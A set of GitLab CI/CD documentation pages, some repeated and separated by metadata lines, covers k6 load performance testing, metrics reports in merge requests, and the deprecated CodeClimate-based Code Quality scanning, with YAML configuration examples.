--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Load Performance Testing breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} With Load Performance Testing, you can test the impact of any pending code changes to your application's backend in [GitLab CI/CD](../_index.md). GitLab uses [k6](https://k6.io/), a free and open source tool, for measuring the system performance of applications under load. Unlike [Browser Performance Testing](browser_performance_testing.md), which is used to measure how web sites perform in client browsers, Load Performance Testing can be used to perform various types of [load tests](https://k6.io/docs/#use-cases) against application endpoints such as APIs, Web Controllers, and so on. This can be used to test how the backend or the server performs at scale. For example, you can use Load Performance Testing to perform many concurrent GET calls to a popular API endpoint in your application to see how it performs. ## How Load Performance Testing works First, define a job in your `.gitlab-ci.yml` file that generates the [Load Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsload_performance). GitLab checks this report, compares key load performance metrics between the source and target branches, and then shows the information in a merge request widget: ![Load Performance Widget](img/load_performance_testing_v13_2.png) Next, you need to configure the test environment and write the k6 test. The key performance metrics that the merge request widget shows after the test completes are: - Checks: The percentage pass rate of the [checks](https://k6.io/docs/using-k6/checks) configured in the k6 test. 
- TTFB P90: The 90th percentile of how long it took to start receiving responses, aka the [Time to First Byte](https://en.wikipedia.org/wiki/Time_to_first_byte) (TTFB). - TTFB P95: The 95th percentile for TTFB. - RPS: The average requests per second (RPS) rate the test was able to achieve. {{< alert type="note" >}} If the Load Performance report has no data to compare, such as when you add the Load Performance job in your `.gitlab-ci.yml` for the very first time, the Load Performance report widget doesn't display. It must have run at least once on the target branch (`main`, for example), before it displays in a merge request targeting that branch. {{< /alert >}} ## Configure the Load Performance Testing job Configuring your Load Performance Testing job can be broken down into several distinct parts: - Determine the test parameters such as throughput, and so on. - Set up the target test environment for load performance testing. - Design and write the k6 test. ### Determine the test parameters The first thing you need to do is determine the [type of load test](https://grafana.com/load-testing/types-of-load-testing/) you want to run, and how you want it to run (for example, the number of users, throughput, and so on). Refer to the [k6 docs](https://k6.io/docs/), especially the [k6 testing guides](https://k6.io/docs/testing-guides) for guidance. ### Test Environment setup A large part of the effort around load performance testing is to prepare the target test environment for high loads. You should ensure it's able to handle the [throughput](https://k6.io/blog/monthly-visits-concurrent-users) it is tested with. It's also typically required to have representative test data in the target environment for the load performance test to use. We strongly recommend [not running these tests against a production environment](https://k6.io/our-beliefs#load-test-in-a-pre-production-environment). 
### Write the load performance test After the environment is prepared, you can write the k6 test itself. k6 is a flexible tool and can be used to run [many kinds of performance tests](https://grafana.com/load-testing/types-of-load-testing/). Refer to the [k6 documentation](https://k6.io/docs/) for detailed information on how to write tests. ### Configure the test in GitLab CI/CD When your k6 test is ready, the next step is to configure the load performance testing job in GitLab CI/CD. The easiest way to do this is to use the [`Verify/Load-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Load-Performance-Testing.gitlab-ci.yml) template that is included with GitLab. {{< alert type="note" >}} For large scale k6 tests you need to ensure the GitLab Runner instance performing the actual test is able to handle running the test. Refer to [k6's guidance](https://k6.io/docs/testing-guides/running-large-tests#hardware-considerations) for spec details. The [default shared GitLab.com runners](../runners/hosted_runners/linux.md) likely have insufficient specs to handle most large k6 tests. {{< /alert >}} This template runs the [k6 Docker container](https://hub.docker.com/r/loadimpact/k6/) in the job and provides several ways to customize the job. An example configuration workflow: 1. Set up GitLab Runner to run Docker containers, like the [Docker-in-Docker workflow](../docker/using_docker_build.md#use-docker-in-docker). 1. Configure the default Load Performance Testing CI/CD job in your `.gitlab-ci.yml` file. You need to include the template and configure it with CI/CD variables: ```yaml include: template: Verify/Load-Performance-Testing.gitlab-ci.yml load_performance: variables: K6_TEST_FILE: <PATH TO K6 TEST FILE IN PROJECT> ``` The previous example creates a `load_performance` job in your CI/CD pipeline that runs the k6 test. 
{{< alert type="note" >}} For Kubernetes setups a different template should be used: [`Jobs/Load-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Load-Performance-Testing.gitlab-ci.yml). {{< /alert >}} k6 has [various options](https://k6.io/docs/using-k6/k6-options/reference/) to configure how it runs the tests, such as what throughput (RPS) to run with, how long the test should run, and so on. Almost all options can be configured in the test itself, but you can also pass command-line options via the `K6_OPTIONS` variable. For example, you can override the duration of the test with a CLI option: ```yaml include: template: Verify/Load-Performance-Testing.gitlab-ci.yml load_performance: variables: K6_TEST_FILE: <PATH TO K6 TEST FILE IN PROJECT> K6_OPTIONS: '--duration 30s' ``` GitLab only displays the key performance metrics in the MR widget if k6's results are saved via [summary export](https://k6.io/docs/results-output/real-time/json/#summary-export) as a [Load Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsload_performance). The latest Load Performance artifact available is always used, using the summary values from the test. If [GitLab Pages](../../user/project/pages/_index.md) is enabled, you can view the report directly in your browser. ### Load Performance testing in review apps The previous CI/CD YAML configuration example works for testing against static environments, but it can be extended to work with [review apps](../review_apps/_index.md) or [dynamic environments](../environments/_index.md) with a few extra steps. The best approach is to capture the dynamic URL in a [`.env` file](https://docs.docker.com/compose/environment-variables/env-file/) as a job artifact to be shared, then use a custom CI/CD variable we've provided named `K6_DOCKER_OPTIONS` to configure the k6 Docker container to use the file.
With this, k6 can then use any environment variables from the `.env` file in scripts using standard JavaScript, such as: ``http.get(`${__ENV.ENVIRONMENT_URL}`)``. For example: 1. In the `review` job: 1. Capture the dynamic URL and save it into a `.env` file, for example, `echo "ENVIRONMENT_URL=$CI_ENVIRONMENT_URL" >> review.env`. 1. Set the `.env` file to be a [job artifact](../jobs/job_artifacts.md). 1. In the `load_performance` job: 1. Set it to depend on the review job, so it inherits the environment file. 1. Set the `K6_DOCKER_OPTIONS` variable with the [Docker CLI option for environment files](https://docs.docker.com/reference/cli/docker/container/run/#env), for example `--env-file review.env`. 1. Configure the k6 test script to use the environment variable in its steps. Your `.gitlab-ci.yml` file might be similar to: ```yaml stages: - deploy - performance include: template: Verify/Load-Performance-Testing.gitlab-ci.yml review: stage: deploy environment: name: review/$CI_COMMIT_REF_SLUG url: http://$CI_ENVIRONMENT_SLUG.example.com script: - run_deploy_script - echo "ENVIRONMENT_URL=$CI_ENVIRONMENT_URL" >> review.env artifacts: paths: - review.env rules: - if: $CI_COMMIT_BRANCH # Modify to match your pipeline rules, or use `only/except` if needed. load_performance: dependencies: - review variables: K6_DOCKER_OPTIONS: '--env-file review.env' rules: - if: $CI_COMMIT_BRANCH # Modify to match your pipeline rules, or use `only/except` if needed. ```
https://docs.gitlab.com/ci/metrics_reports
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/metrics_reports.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
metrics_reports.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Metrics reports
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Metrics reports display custom metrics in merge requests to track performance, memory usage, and other measurements between branches. Use metrics reports to: - Monitor memory usage changes. - Track load testing results. - Measure code complexity. - Compare code coverage statistics. ## Metrics processing workflow When a pipeline runs, GitLab reads metrics from the report artifact and stores them as string values for comparison. The default filename is `metrics.txt`. For a merge request, GitLab compares the metrics from the feature branch to the values from the target branch and displays them in the merge request widget in this order: - Existing metrics with changed values. - Metrics added by the merge request (marked with a **New** badge). - Metrics removed by the merge request (marked with a **Removed** badge). - Existing metrics with unchanged values. ## Configure metrics reports Add metrics reports to your CI/CD pipeline to track custom metrics in merge requests. Prerequisites: - The metrics file must use the [OpenMetrics](https://prometheus.io/docs/instrumenting/exposition_formats/#openmetrics-text-format) text format. To configure metrics reports: 1. In your `.gitlab-ci.yml` file, add a job that generates a metrics report. 1. Add a script to the job that generates metrics in OpenMetrics format. 1. Configure the job to upload the metrics file with [`artifacts:reports:metrics`](../yaml/artifacts_reports.md#artifactsreportsmetrics). For example: ```yaml metrics: stage: test script: - echo 'memory_usage_bytes 2621440' > metrics.txt - echo 'response_time_seconds 0.234' >> metrics.txt - echo 'test_coverage_percent 87.5' >> metrics.txt - echo '# EOF' >> metrics.txt artifacts: reports: metrics: metrics.txt ``` After the pipeline runs, the metrics reports display in the merge request widget. 
![Metrics report widget in a merge request displaying metric names and values.](img/metrics_report_v18_3.png) For additional format specifications and examples, see [Prometheus text format details](https://prometheus.io/docs/instrumenting/exposition_formats/#text-format-details). ## Troubleshooting When working with metrics reports, you might encounter the following issues. ### Metrics reports did not change You might see **Metrics report scanning detected no new changes** when viewing metrics reports in merge requests. This issue occurs when: - The target branch doesn't have a baseline metrics report for comparison. - Your GitLab subscription doesn't include metrics reports (Premium or Ultimate required). To resolve this issue: 1. Verify your GitLab subscription tier includes metrics reports. 1. Ensure the target branch has a pipeline with metrics reports configured. 1. Verify that your metrics file uses valid OpenMetrics format.
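A quick local sanity check for that last point — this sketch only verifies the loose shape the examples above use (`name value` pairs terminated by `# EOF`), not the full OpenMetrics grammar:

```shell
# Build a sample metrics file like the example job does.
printf '%s\n' 'memory_usage_bytes 2621440' 'response_time_seconds 0.234' '# EOF' > metrics.txt

# Every non-comment line must be "<metric_name> <numeric value>",
# and the file must end with the "# EOF" terminator.
if awk '
  /^#/ { next }
  !/^[a-zA-Z_:][a-zA-Z0-9_:]* -?[0-9.eE+-]+$/ { bad = 1 }
  END { exit bad }
' metrics.txt && [ "$(tail -n 1 metrics.txt)" = "# EOF" ]; then
  echo "metrics.txt looks valid"
else
  echo "metrics.txt is malformed" >&2
fi
```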
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Metrics reports breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Metrics reports display custom metrics in merge requests to track performance, memory usage, and other measurements between branches. Use metrics reports to: - Monitor memory usage changes. - Track load testing results. - Measure code complexity. - Compare code coverage statistics. ## Metrics processing workflow When a pipeline runs, GitLab reads metrics from the report artifact and stores them as string values for comparison. The default filename is `metrics.txt`. For a merge request, GitLab compares the metrics from the feature branch to the values from the target branch and displays them in the merge request widget in this order: - Existing metrics with changed values. - Metrics added by the merge request (marked with a **New** badge). - Metrics removed by the merge request (marked with a **Removed** badge). - Existing metrics with unchanged values. ## Configure metrics reports Add metrics reports to your CI/CD pipeline to track custom metrics in merge requests. Prerequisites: - The metrics file must use the [OpenMetrics](https://prometheus.io/docs/instrumenting/exposition_formats/#openmetrics-text-format) text format. To configure metrics reports: 1. In your `.gitlab-ci.yml` file, add a job that generates a metrics report. 1. Add a script to the job that generates metrics in OpenMetrics format. 1. Configure the job to upload the metrics file with [`artifacts:reports:metrics`](../yaml/artifacts_reports.md#artifactsreportsmetrics). 
For example: ```yaml metrics: stage: test script: - echo 'memory_usage_bytes 2621440' > metrics.txt - echo 'response_time_seconds 0.234' >> metrics.txt - echo 'test_coverage_percent 87.5' >> metrics.txt - echo '# EOF' >> metrics.txt artifacts: reports: metrics: metrics.txt ``` After the pipeline runs, the metrics reports display in the merge request widget. ![Metrics report widget in a merge request displaying metric names and values.](img/metrics_report_v18_3.png) For additional format specifications and examples, see [Prometheus text format details](https://prometheus.io/docs/instrumenting/exposition_formats/#text-format-details). ## Troubleshooting When working with metrics reports, you might encounter the following issues. ### Metrics reports did not change You might see **Metrics report scanning detected no new changes** when viewing metrics reports in merge requests. This issue occurs when: - The target branch doesn't have a baseline metrics report for comparison. - Your GitLab subscription doesn't include metrics reports (Premium or Ultimate required). To resolve this issue: 1. Verify your GitLab subscription tier includes metrics reports. 1. Ensure the target branch has a pipeline with metrics reports configured. 1. Verify that your metrics file uses valid OpenMetrics format.
https://docs.gitlab.com/ci/code_quality_codeclimate_scanning
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/code_quality_codeclimate_scanning.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
code_quality_codeclimate_scanning.md
Application Security Testing
Static Analysis
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Configure CodeClimate-based Code Quality scanning (deprecated)
null
<!--- start_remove The following content will be removed on remove_date: '2025-08-15' --> {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} This feature was [deprecated](../../update/deprecations.md#codeclimate-based-code-quality-scanning-will-be-removed) in GitLab 17.3 and is planned for removal in 19.0. [Integrate the results from a supported tool directly](code_quality.md#import-code-quality-results-from-a-cicd-job) instead. This change is a breaking change. {{< /alert >}} Code Quality includes a built-in CI/CD template, `Code-Quality.gitlab-ci.yaml`. This template runs a scan based on the open source CodeClimate scanning engine. The CodeClimate engine runs: - Basic maintainability checks for a [set of supported languages](https://docs.codeclimate.com/docs/supported-languages-for-maintainability). - A configurable set of [plugins](https://docs.codeclimate.com/docs/list-of-engines), which wrap open source scanners, to analyze your source code. ## Enable CodeClimate-based scanning Prerequisites: - GitLab CI/CD configuration (`.gitlab-ci.yml`) must include the `test` stage. - If you're using instance runners, the Code Quality job must be configured for the [Docker-in-Docker workflow](../docker/using_docker_build.md#use-docker-in-docker). When using this workflow, the `/builds` volume must be mapped to allow reports to be saved. - If you're using private runners, you should use an [alternative configuration](#use-private-runners) recommended for running Code Quality analysis more efficiently. - The runner must have enough disk space to store the generated Code Quality files. For example, on the [GitLab project](https://gitlab.com/gitlab-org/gitlab) the files are approximately 7 GB. To enable Code Quality, either: - Enable [Auto DevOps](../../topics/autodevops/_index.md), which includes [Auto Code Quality](../../topics/autodevops/stages.md#auto-code-quality). 
- Include the [Code Quality template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Code-Quality.gitlab-ci.yml) in your `.gitlab-ci.yml` file. Example: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml ``` Code Quality now runs in pipelines. {{< alert type="warning" >}} On GitLab Self-Managed, if a malicious actor compromises the Code Quality job definition they could execute privileged Docker commands on the runner host. Having proper access control policies mitigates this attack vector by allowing access only to trusted actors. {{< /alert >}} ## Disable CodeClimate-based scanning The `code_quality` job doesn't run if the `$CODE_QUALITY_DISABLED` CI/CD variable is present. For more information about how to define a variable, see [GitLab CI/CD variables](../variables/_index.md). To disable Code Quality, create a custom CI/CD variable named `CODE_QUALITY_DISABLED`, for either: - [The whole project](../variables/_index.md#for-a-project). - [A single pipeline](../pipelines/_index.md#run-a-pipeline-manually). ## Configure CodeClimate analysis plugins By default, the `code_quality` job configures CodeClimate to: - Use [a specific set of plugins](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template?ref_type=heads). - Use [default configurations](https://gitlab.com/gitlab-org/ci-cd/codequality/-/tree/master/codeclimate_defaults?ref_type=heads) for those plugins. To scan more languages, you can enable more [plugins](https://docs.codeclimate.com/docs/list-of-engines). You can also disable plugins that the `code_quality` job enables by default. For example, to use the [SonarJava analyzer](https://docs.codeclimate.com/docs/sonar-java): 1. Add a file named `.codeclimate.yml` to the root of your repository 1. 
Add the [enablement code](https://docs.codeclimate.com/docs/sonar-java#enable-the-plugin) for the plugin to the `.codeclimate.yml` file in the root of your repository: ```yaml version: "2" plugins: sonar-java: enabled: true ``` This adds SonarJava to the `plugins:` section of the [default `.codeclimate.yml`](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template) included in your project. Changes to the `plugins:` section do not affect the `exclude_patterns` section of the default `.codeclimate.yml`. See the Code Climate documentation on [excluding files and folders](https://docs.codeclimate.com/docs/excluding-files-and-folders) for more details. ## Customize scan job settings You can change the behavior of the `code_quality` scan job by setting [CI/CD variables](#available-cicd-variables) in your GitLab CI/CD YAML. To configure the Code Quality job: 1. Declare a job with the same name as the Code Quality job, after the template's inclusion. 1. Specify additional keys in the job's stanza. For an example, see [Download output in HTML format](#output-in-only-html-format). ### Available CI/CD variables Code Quality can be customized by defining available CI/CD variables: | CI/CD variable | Description | |---------------------------------|-------------| | `CODECLIMATE_DEBUG` | Set to enable [Code Climate debug mode](https://github.com/codeclimate/codeclimate#environment-variables). | | `CODECLIMATE_DEV` | Set to enable `--dev` mode which lets you run engines not known to the CLI. | | `CODECLIMATE_PREFIX` | Set a prefix to use with all `docker pull` commands in CodeClimate engines. Useful for [offline scanning](https://github.com/codeclimate/codeclimate/pull/948). For more information, see [Use a private container registry](#use-a-private-container-image-registry). | | `CODECLIMATE_REGISTRY_USERNAME` | Set to specify the username for the registry domain parsed from `CODECLIMATE_PREFIX`.
| | `CODECLIMATE_REGISTRY_PASSWORD` | Set to specify the password for the registry domain parsed from `CODECLIMATE_PREFIX`. | | `CODE_QUALITY_DISABLED` | Prevents the Code Quality job from running. | | `CODE_QUALITY_IMAGE` | Set to a fully prefixed image name. Image must be accessible from your job environment. | | `ENGINE_MEMORY_LIMIT_BYTES` | Set the memory limit for engines. Default: 1,024,000,000 bytes. | | `REPORT_STDOUT` | Set to print the report to `STDOUT` instead of generating the usual report file. | | `REPORT_FORMAT` | Set to control the format of the generated report file. Either `json` or `html`. | | `SOURCE_CODE` | Path to the source code to scan. Must be the absolute path to a directory where cloned sources are stored. | | `TIMEOUT_SECONDS` | Custom timeout per engine container for the `codeclimate analyze` command. Default: 900 seconds (15 minutes) | ### Output Code Quality outputs a report containing details of issues found. The content of this report is processed internally and the results shown in the UI. The report is also output as a job artifact of the `code_quality` job, named `gl-code-quality-report.json`. You can optionally output the report in HTML format. For example, you could publish the HTML format file on GitLab Pages for even easier reviewing. #### Output in JSON and HTML format To output the Code Quality report in JSON and HTML format, you create an additional job. This requires Code Quality to be run twice, once for each file format. To output the Code Quality report in HTML format, add another job to your template by using `extends: code_quality`: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml code_quality_html: extends: code_quality variables: REPORT_FORMAT: html artifacts: paths: [gl-code-quality-report.html] ``` Both the JSON and HTML files are output as job artifacts. The HTML file is contained in the `artifacts.zip` job artifact.
---
stage: Application Security Testing
group: Static Analysis
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Configure CodeClimate-based Code Quality scanning (deprecated)
---

<!--- start_remove
The following content will be removed on remove_date: '2025-08-15' -->

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< alert type="warning" >}}

This feature was [deprecated](../../update/deprecations.md#codeclimate-based-code-quality-scanning-will-be-removed) in GitLab 17.3 and is planned for removal in 19.0. [Integrate the results from a supported tool directly](code_quality.md#import-code-quality-results-from-a-cicd-job) instead. This is a breaking change.

{{< /alert >}}

Code Quality includes a built-in CI/CD template, `Code-Quality.gitlab-ci.yml`. This template runs a scan based on the open source CodeClimate scanning engine.

The CodeClimate engine runs:

- Basic maintainability checks for a [set of supported languages](https://docs.codeclimate.com/docs/supported-languages-for-maintainability).
- A configurable set of [plugins](https://docs.codeclimate.com/docs/list-of-engines), which wrap open source scanners, to analyze your source code.

## Enable CodeClimate-based scanning

Prerequisites:

- GitLab CI/CD configuration (`.gitlab-ci.yml`) must include the `test` stage.
- If you're using instance runners, the Code Quality job must be configured for the [Docker-in-Docker workflow](../docker/using_docker_build.md#use-docker-in-docker). When using this workflow, the `/builds` volume must be mapped to allow reports to be saved.
- If you're using private runners, you should use an [alternative configuration](#use-private-runners) recommended for running Code Quality analysis more efficiently.
- The runner must have enough disk space to store the generated Code Quality files. For example, on the [GitLab project](https://gitlab.com/gitlab-org/gitlab) the files are approximately 7 GB.

To enable Code Quality, either:

- Enable [Auto DevOps](../../topics/autodevops/_index.md), which includes [Auto Code Quality](../../topics/autodevops/stages.md#auto-code-quality).
- Include the [Code Quality template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Code-Quality.gitlab-ci.yml) in your `.gitlab-ci.yml` file.

  Example:

  ```yaml
  include:
    - template: Jobs/Code-Quality.gitlab-ci.yml
  ```

Code Quality now runs in pipelines.

{{< alert type="warning" >}}

On GitLab Self-Managed, if a malicious actor compromises the Code Quality job definition, they could execute privileged Docker commands on the runner host. Having proper access control policies mitigates this attack vector by allowing access only to trusted actors.

{{< /alert >}}

## Disable CodeClimate-based scanning

The `code_quality` job doesn't run if the `$CODE_QUALITY_DISABLED` CI/CD variable is present. For more information about how to define a variable, see [GitLab CI/CD variables](../variables/_index.md).

To disable Code Quality, create a custom CI/CD variable named `CODE_QUALITY_DISABLED`, for either:

- [The whole project](../variables/_index.md#for-a-project).
- [A single pipeline](../pipelines/_index.md#run-a-pipeline-manually).

## Configure CodeClimate analysis plugins

By default, the `code_quality` job configures CodeClimate to:

- Use [a specific set of plugins](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template?ref_type=heads).
- Use [default configurations](https://gitlab.com/gitlab-org/ci-cd/codequality/-/tree/master/codeclimate_defaults?ref_type=heads) for those plugins.

To scan more languages, you can enable more [plugins](https://docs.codeclimate.com/docs/list-of-engines).
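Beyond enabling and disabling plugins, a `.codeclimate.yml` file at the repository root can also tune a plugin's configuration. As a hedged sketch, the following adjusts the default duplication engine's sensitivity; the `mass_threshold` value shown is illustrative, not a recommendation:

```yaml
version: "2"
plugins:
  duplication:
    enabled: true
    config:
      languages:
        ruby:
          mass_threshold: 50  # illustrative value; raise to report only larger duplications
```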
You can also disable plugins that the `code_quality` job enables by default.

For example, to use the [SonarJava analyzer](https://docs.codeclimate.com/docs/sonar-java):

1. Add a file named `.codeclimate.yml` to the root of your repository.
1. Add the [enablement code](https://docs.codeclimate.com/docs/sonar-java#enable-the-plugin) for the plugin to the `.codeclimate.yml` file:

   ```yaml
   version: "2"
   plugins:
     sonar-java:
       enabled: true
   ```

This adds SonarJava to the `plugins:` section of the [default `.codeclimate.yml`](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template) included in your project.

Changes to the `plugins:` section do not affect the `exclude_patterns` section of the default `.codeclimate.yml`. See the Code Climate documentation on [excluding files and folders](https://docs.codeclimate.com/docs/excluding-files-and-folders) for more details.

## Customize scan job settings

You can change the behavior of the `code_quality` scan job by setting [CI/CD variables](#available-cicd-variables) in your GitLab CI/CD YAML.

To configure the Code Quality job:

1. Declare a job with the same name as the Code Quality job, after the template's inclusion.
1. Specify additional keys in the job's stanza.

For an example, see [Output in only HTML format](#output-in-only-html-format).

### Available CI/CD variables

Code Quality can be customized by defining available CI/CD variables:

| CI/CD variable                  | Description |
|---------------------------------|-------------|
| `CODECLIMATE_DEBUG`             | Set to enable [Code Climate debug mode](https://github.com/codeclimate/codeclimate#environment-variables). |
| `CODECLIMATE_DEV`               | Set to enable `--dev` mode, which lets you run engines not known to the CLI. |
| `CODECLIMATE_PREFIX`            | Set a prefix to use with all `docker pull` commands in CodeClimate engines. Useful for [offline scanning](https://github.com/codeclimate/codeclimate/pull/948). For more information, see [Use a private container image registry](#use-a-private-container-image-registry). |
| `CODECLIMATE_REGISTRY_USERNAME` | Set to specify the username for the registry domain parsed from `CODECLIMATE_PREFIX`. |
| `CODECLIMATE_REGISTRY_PASSWORD` | Set to specify the password for the registry domain parsed from `CODECLIMATE_PREFIX`. |
| `CODE_QUALITY_DISABLED`         | Prevents the Code Quality job from running. |
| `CODE_QUALITY_IMAGE`            | Set to a fully prefixed image name. Image must be accessible from your job environment. |
| `ENGINE_MEMORY_LIMIT_BYTES`     | Set the memory limit for engines. Default: 1,024,000,000 bytes. |
| `REPORT_STDOUT`                 | Set to print the report to `STDOUT` instead of generating the usual report file. |
| `REPORT_FORMAT`                 | Set to control the format of the generated report file. Either `json` or `html`. |
| `SOURCE_CODE`                   | Path to the source code to scan. Must be the absolute path to a directory where cloned sources are stored. |
| `TIMEOUT_SECONDS`               | Custom timeout per engine container for the `codeclimate analyze` command. Default: 900 seconds (15 minutes). |

### Output

Code Quality outputs a report containing details of issues found. The content of this report is processed internally and the results shown in the UI. The report is also output as a job artifact of the `code_quality` job, named `gl-code-quality-report.json`.

You can optionally output the report in HTML format. For example, you could publish the HTML format file on GitLab Pages for even easier reviewing.

#### Output in JSON and HTML format

To output the Code Quality report in JSON and HTML format, you create an additional job. This requires Code Quality to be run twice, once for each file format.
To output the Code Quality report in HTML format, add another job to your template by using `extends: code_quality`:

```yaml
include:
  - template: Jobs/Code-Quality.gitlab-ci.yml

code_quality_html:
  extends: code_quality
  variables:
    REPORT_FORMAT: html
  artifacts:
    paths: [gl-code-quality-report.html]
```

Both the JSON and HTML files are output as job artifacts. The HTML file is contained in the `artifacts.zip` job artifact.

#### Output in only HTML format

To download the Code Quality report in only HTML format, set `REPORT_FORMAT` to `html`, overriding the default definition of the `code_quality` job.

{{< alert type="note" >}}

This does not create a JSON format file, so Code Quality results are not shown in the merge request widget, pipeline report, or changes view.

{{< /alert >}}

```yaml
include:
  - template: Jobs/Code-Quality.gitlab-ci.yml

code_quality:
  variables:
    REPORT_FORMAT: html
  artifacts:
    paths: [gl-code-quality-report.html]
```

The HTML file is output as a job artifact.

## Use Code Quality with merge request pipelines

The default Code Quality configuration does not allow the `code_quality` job to run on [merge request pipelines](../pipelines/merge_request_pipelines.md).

To enable Code Quality to run on merge request pipelines, overwrite the code quality `rules`, or [`workflow: rules`](../yaml/_index.md#workflow), so that they match your current `rules`.

For example:

```yaml
include:
  - template: Jobs/Code-Quality.gitlab-ci.yml

code_quality:
  rules:
    - if: $CODE_QUALITY_DISABLED
      when: never
    - if: $CI_PIPELINE_SOURCE == "merge_request_event" # Run code quality job in merge request pipelines
    - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH      # Run code quality job in pipelines on the default branch (but not in other branch pipelines)
    - if: $CI_COMMIT_TAG                               # Run code quality job in pipelines for tags
```

## Change how CodeClimate images are downloaded

The CodeClimate engine downloads container images to run each of its plugins.
By default, the images are downloaded from Docker Hub. You can change the image source to improve performance, work around Docker Hub rate limits, or use a private registry.

### Use the Dependency Proxy to download images

You can use a Dependency Proxy to reduce the time taken to download dependencies.

Prerequisites:

- [Dependency Proxy](../../user/packages/dependency_proxy/_index.md) enabled in the project's group.

To reference the Dependency Proxy, configure the following variables in the `.gitlab-ci.yml` file:

- `CODE_QUALITY_IMAGE`
- `CODECLIMATE_PREFIX`
- `CODECLIMATE_REGISTRY_USERNAME`
- `CODECLIMATE_REGISTRY_PASSWORD`

For example:

```yaml
include:
  - template: Jobs/Code-Quality.gitlab-ci.yml

code_quality:
  variables:
    ## You must add a trailing slash to `$CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX`.
    CODECLIMATE_PREFIX: $CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX/
    CODECLIMATE_REGISTRY_USERNAME: $CI_DEPENDENCY_PROXY_USER
    CODECLIMATE_REGISTRY_PASSWORD: $CI_DEPENDENCY_PROXY_PASSWORD
```

### Use Docker Hub with authentication

You can use Docker Hub as an alternate source of the Code Quality images.

Prerequisites:

- Add the username and password as [protected CI/CD variables](../variables/_index.md#for-a-project) in the project.

To use Docker Hub, configure the following variables in the `.gitlab-ci.yml` file:

- `CODECLIMATE_PREFIX`
- `CODECLIMATE_REGISTRY_USERNAME`
- `CODECLIMATE_REGISTRY_PASSWORD`

Example:

```yaml
include:
  - template: Jobs/Code-Quality.gitlab-ci.yml

code_quality:
  variables:
    CODECLIMATE_PREFIX: "registry-1.docker.io/"
    CODECLIMATE_REGISTRY_USERNAME: $DOCKERHUB_USERNAME
    CODECLIMATE_REGISTRY_PASSWORD: $DOCKERHUB_PASSWORD
```

### Use a private container image registry

Using a private container image registry can reduce the time taken to download images, and also reduce external dependencies.
You must configure the registry prefix to be passed down to CodeClimate's subsequent `docker pull` commands for individual engines, because of the nested method of container execution.

The following variables can address all of the required image pulls:

- `CODE_QUALITY_IMAGE`: A fully prefixed image name that can be located anywhere accessible from your job environment. GitLab container registry can be used here to host your own copy.
- `CODECLIMATE_PREFIX`: The domain of your intended container image registry. This is a configuration option supported by [CodeClimate CLI](https://github.com/codeclimate/codeclimate/pull/948). You must:
  - Include a trailing slash (`/`).
  - Not include a protocol prefix, such as `https://`.
- `CODECLIMATE_REGISTRY_USERNAME`: An optional variable to specify the username for the registry domain parsed from `CODECLIMATE_PREFIX`.
- `CODECLIMATE_REGISTRY_PASSWORD`: An optional variable to specify the password for the registry domain parsed from `CODECLIMATE_PREFIX`.

```yaml
include:
  - template: Jobs/Code-Quality.gitlab-ci.yml

code_quality:
  variables:
    CODE_QUALITY_IMAGE: "my-private-registry.local:12345/codequality:0.85.24"
    CODECLIMATE_PREFIX: "my-private-registry.local:12345/"
```

This example is specific to GitLab Code Quality. For more general instructions on how to configure DinD with a registry mirror, see [Enable registry mirror for Docker-in-Docker service](../docker/using_docker_build.md#enable-registry-mirror-for-dockerdind-service).
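If your private registry requires authentication, the same override can be extended with the optional credential variables. As a hedged sketch, `$PRIVATE_REGISTRY_USER` and `$PRIVATE_REGISTRY_PASSWORD` are illustrative project-level CI/CD variables, not values provided by GitLab:

```yaml
include:
  - template: Jobs/Code-Quality.gitlab-ci.yml

code_quality:
  variables:
    CODE_QUALITY_IMAGE: "my-private-registry.local:12345/codequality:0.85.24"
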